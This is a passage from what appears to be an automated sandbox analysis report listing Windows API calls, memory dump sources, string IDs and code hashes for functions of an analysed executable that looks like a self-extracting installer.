                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                          • SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                          • GetWindow.USER32(?,00000005), ref: 00407E76
                          • GetWindow.USER32(?,00000005), ref: 00407E92
                          • GetWindow.USER32(?,00000005), ref: 00407EAA
                          • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,0040803E), ref: 00407F0A
                          • LoadIconW.USER32(00000000), ref: 00407F0D
                          • GetDlgItem.USER32(?,000004B1), ref: 00407F28
                          • SendMessageW.USER32(00000000), ref: 00407F2F
                            • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                            • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                            • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                            • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: Window$HandleItemLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                          • String ID:
                          • API String ID: 1889686859-0
                          • Opcode ID: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
                          • Instruction ID: b6a50195b8a608de49edc5b96f3e83ee8a9b90890169e94b1220211b89b9884f
                          • Opcode Fuzzy Hash: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
                          • Instruction Fuzzy Hash: E861D47064C7096AE9257B61DC4AF3B3699AB40B05F10447FF642B92D2DBBCBC0056AF
                          APIs
                          • GetParent.USER32(?), ref: 00406F45
                          • GetWindowLongW.USER32(00000000), ref: 00406F4C
                          • DefWindowProcW.USER32(?,?,?,?), ref: 00406F62
                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 00406F7F
                          • GetSystemMetrics.USER32(00000031), ref: 00406F91
                          • GetSystemMetrics.USER32(00000032), ref: 00406F98
                          • GetWindowDC.USER32(?), ref: 00406FAA
                          • GetWindowRect.USER32(?,?), ref: 00406FB7
                          • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 00406FEB
                          • ReleaseDC.USER32(?,00000000), ref: 00406FF3
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                          • String ID:
                          • API String ID: 2586545124-0
                          • Opcode ID: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
                          • Instruction ID: b1ff7c23223d170b9333fa97acec74f2c9230ee3eabfe87d0be763292bfdf634
                          • Opcode Fuzzy Hash: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
                          • Instruction Fuzzy Hash: 8E210C7650021ABFCF01AFA8DD48DDF7F69FB08351F008565FA15E21A0C775EA209B64
                          APIs
                          • GetDlgItem.USER32(?,000004B3), ref: 0040678E
                          • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067A1
                          • GetDlgItem.USER32(?,000004B4), ref: 004067AB
                          • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067B3
                          • SendMessageW.USER32(?,00000401,?,00000000), ref: 004067C3
                          • GetDlgItem.USER32(?,?), ref: 004067CC
                          • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004067D4
                          • GetDlgItem.USER32(?,?), ref: 004067DD
                          • SetFocus.USER32(00000000,?,000004B4,76230E50,00407E06,000004B4,000004B3,00000000,000004B4,00000000,000004B2,?,000004B7), ref: 004067E0
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ItemMessageSend$Focus
                          • String ID:
                          • API String ID: 3946207451-0
                          • Opcode ID: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                          • Instruction ID: e7a8c5b21de344c7c4c5496bf688f1d5cc3ba414acf11b32f4788b893cc62525
                          • Opcode Fuzzy Hash: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                          • Instruction Fuzzy Hash: 6FF04F712403087BEA212B61DD86F5BBA6EEF81B45F018425F340650F0CBF7EC109A28
                          APIs
                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0040C603
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID: IA$IA$IA$IA$IA$IA
                          • API String ID: 613200358-3743982587
                          • Opcode ID: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
                          • Instruction ID: 4cebfcab61734def35128a955d6a3e34031d8899c11ca8f9bd2aeb72941b6852
                          • Opcode Fuzzy Hash: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
                          • Instruction Fuzzy Hash: D2221671900248DFCB24EF65C8D09EEBBB5FF48304F50852EE91AA7291DB38A945CF58
                          APIs
                          • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,00417788,00000000,SetEnvironment), ref: 00408479
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID: BeginPrompt$ErrorTitle$FinishMessage$HelpText$SetEnvironment$WarningTitle
                          • API String ID: 613200358-994561823
                          • Opcode ID: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
                          • Instruction ID: 5566f9f9667118f06bc812855c9affabb63102f3a10b3971892d5eca1131561f
                          • Opcode Fuzzy Hash: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
                          • Instruction Fuzzy Hash: CA51D47080420AAACF24AB559E85AFB7774EB20348F54443FF881722E1EF7D5D82D64E
                          APIs
                          • memcpy.MSVCRT(?,00417410,00000160), ref: 00406DD1
                          • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00406DF0
                          • GetDC.USER32(00000000), ref: 00406DFB
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00406E07
                          • MulDiv.KERNEL32(?,00000048,00000000), ref: 00406E16
                          • ReleaseDC.USER32(00000000,?), ref: 00406E24
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00406E4C
                          • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_0000667A), ref: 00406E81
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                          • String ID:
                          • API String ID: 2693764856-0
                          • Opcode ID: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                          • Instruction ID: b2c1943609947f3a034a1f42a4fd453b3666a2b5c4d4ccfd9a1c2059c5c1cb6f
                          • Opcode Fuzzy Hash: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                          • Instruction Fuzzy Hash: C32184B5500218BFDB215F61DC45EEB7B7CFB08746F0040B6F609A1190D7748E948B65
                          APIs
                          • GetDC.USER32(?), ref: 0040696E
                          • GetSystemMetrics.USER32(0000000B), ref: 0040698A
                          • GetSystemMetrics.USER32(0000003D), ref: 00406993
                          • GetSystemMetrics.USER32(0000003E), ref: 0040699B
                          • SelectObject.GDI32(?,?), ref: 004069B8
                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004069D3
                          • SelectObject.GDI32(?,?), ref: 004069F9
                          • ReleaseDC.USER32(?,?), ref: 00406A08
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                          • String ID:
                          • API String ID: 2466489532-0
                          • Opcode ID: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                          • Instruction ID: 7c755332e1b278278a0584394201b19561512224090c74d51841a9ad660c27ee
                          • Opcode Fuzzy Hash: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                          • Instruction Fuzzy Hash: 6B216871900209EFCB119F65DD84A8EBFF4EF08321F10C46AE559A72A0C7359A50DF40
                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
                          • GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                          • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                          • wsprintfW.USER32 ref: 00407BBB
                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                          • String ID: %d%%
                          • API String ID: 3753976982-1518462796
                          • Opcode ID: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
                          • Instruction ID: b955b8041d8a67620c3180d4911c799512bd6939d195f5b55c3092177650065a
                          • Opcode Fuzzy Hash: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
                          • Instruction Fuzzy Hash: 1D31D371904208BBDB11AFA0CC45EDA7BB9EF48708F10847AFA42B61E1D779B904CB59
                          APIs
                          • lstrlenW.KERNEL32(hAA,00000020,?,?,00405838,?,?,?,00000000,?), ref: 004040A4
                            • Part of subcall function 00401A85: CharUpperW.USER32(?,7622E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                            • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404156
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040415E
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040416D
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404175
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ??3@$CharUpper$lstrlen
                          • String ID: hAA
                          • API String ID: 2587799592-1362906312
                          • Opcode ID: f1afb06a12cfea52e195ddd9e8ddb158cdff932f9735d488ba252034b153affa
                          • Instruction ID: 7f7e13310b21401de90169bcc26cd057e2afddf23eedd5de54135d69024cf91c
                          • Opcode Fuzzy Hash: f1afb06a12cfea52e195ddd9e8ddb158cdff932f9735d488ba252034b153affa
                          • Instruction Fuzzy Hash: D7212772D40215AACF20ABA4CC46AEB77B9DF90354F10407BEB41BB2E1E7789D848658
                          APIs
                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000001,00000000,00000000,00000001,?,00000000), ref: 00404D3E
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DA0
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DB8
                            • Part of subcall function 00403354: lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                            • Part of subcall function 00403354: GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                            • Part of subcall function 00403354: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                            • Part of subcall function 00403354: ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ??3@$FileTime$AttributesSystemlstrlen
                          • String ID: 03A$;!@Install@!UTF-8!$;!@InstallEnd@!
                          • API String ID: 4038993085-2279431206
                          • Opcode ID: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
                          • Instruction ID: 637b7b13a9bcd1d52ea1019587bfa2fb4435f6835f564ae220b3123002230846
                          • Opcode Fuzzy Hash: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
                          • Instruction Fuzzy Hash: CE312D71D0021EEACF05EF92CD429EEBBB4BF44318F10042BE911762E1DB785649DB98
                          APIs
                          • EndDialog.USER32(?,00000000), ref: 00407579
                          • KillTimer.USER32(?,00000001), ref: 0040758A
                          • SetTimer.USER32(?,00000001,00000000,00000000), ref: 004075B4
                          • SuspendThread.KERNEL32(00000294), ref: 004075CD
                          • ResumeThread.KERNEL32(00000294), ref: 004075EA
                          • EndDialog.USER32(?,00000000), ref: 0040760C
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: DialogThreadTimer$KillResumeSuspend
                          • String ID:
                          • API String ID: 4151135813-0
                          • Opcode ID: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                          • Instruction ID: ebb94c5c4675b2e6542c2b2cb7d5652cccd5624f9a00d71f737e39ca63bd9789
                          • Opcode Fuzzy Hash: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                          • Instruction Fuzzy Hash: 9811BF70A08618BBD7212F15EE849E77BBDFB00756B00843AF523A05A0CB39BD00DA1D
                          APIs
                          • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
                            • Part of subcall function 00404343: ??3@YAXPAX@Z.MSVCRT(?,?,?,004177C4,004177C4,?,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 004043B6
                          • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
                          • wsprintfA.USER32 ref: 00404EBC
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ??3@$wsprintf
                          • String ID: :Language:%u!$;!@Install@!UTF-8!$;!@InstallEnd@!
                          • API String ID: 2704270482-1550708412
                          • Opcode ID: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
                          • Instruction ID: afe26c372a183c0ca4a1b7edc16cb7be903c3e4040aad79e05e22cec791dc9d0
                          • Opcode Fuzzy Hash: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
                          • Instruction Fuzzy Hash: D8115E71B00018BBCF00FB95CC42EFE77ADAB84705B10402EBA15E3182DB78AB028799
                          APIs
                          • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000,00000000), ref: 004038C6
                          • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000), ref: 00403904
                          • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405), ref: 0040392A
                          • ??3@YAXPAX@Z.MSVCRT(00000000,00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788), ref: 00403932
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID: %%T/$%%T\
                          • API String ID: 613200358-2679640699
                          • Opcode ID: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
                          • Instruction ID: 53c9ca64f2466311d4136dbbff57d229d1af9e29f5fa76e56e45344ae10c91f3
                          • Opcode Fuzzy Hash: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
                          • Instruction Fuzzy Hash: 5011DD3190410EBACF05FFA1D857CEDBB79AE00708F50806AB511760E1EF79A785DB98
                          APIs
                          • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403981
                          • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 004039BF
                          • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405), ref: 004039E5
                          • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784), ref: 004039ED
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID: %%S/$%%S\
                          • API String ID: 613200358-358529586
                          • Opcode ID: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
                          • Instruction ID: c240205f9e12946546b7747d8fd44f392230bc1153c6614d6b8016afa5fd7689
                          • Opcode Fuzzy Hash: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
                          • Instruction Fuzzy Hash: 1D11AD3190410EBACF05FFA1D856CEDBB79AE00708F51806AB511760E1EF78A789DB98
                          APIs
                          • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403A3C
                          • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 00403A7A
                          • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405), ref: 00403AA0
                          • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784), ref: 00403AA8
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID: %%M/$%%M\
                          • API String ID: 613200358-4143866494
                          • Opcode ID: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
